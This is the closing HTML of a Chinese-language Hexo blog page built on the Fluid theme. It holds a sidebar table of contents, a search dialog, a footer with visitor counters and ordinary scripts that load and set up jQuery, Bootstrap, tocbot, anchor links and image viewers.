        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
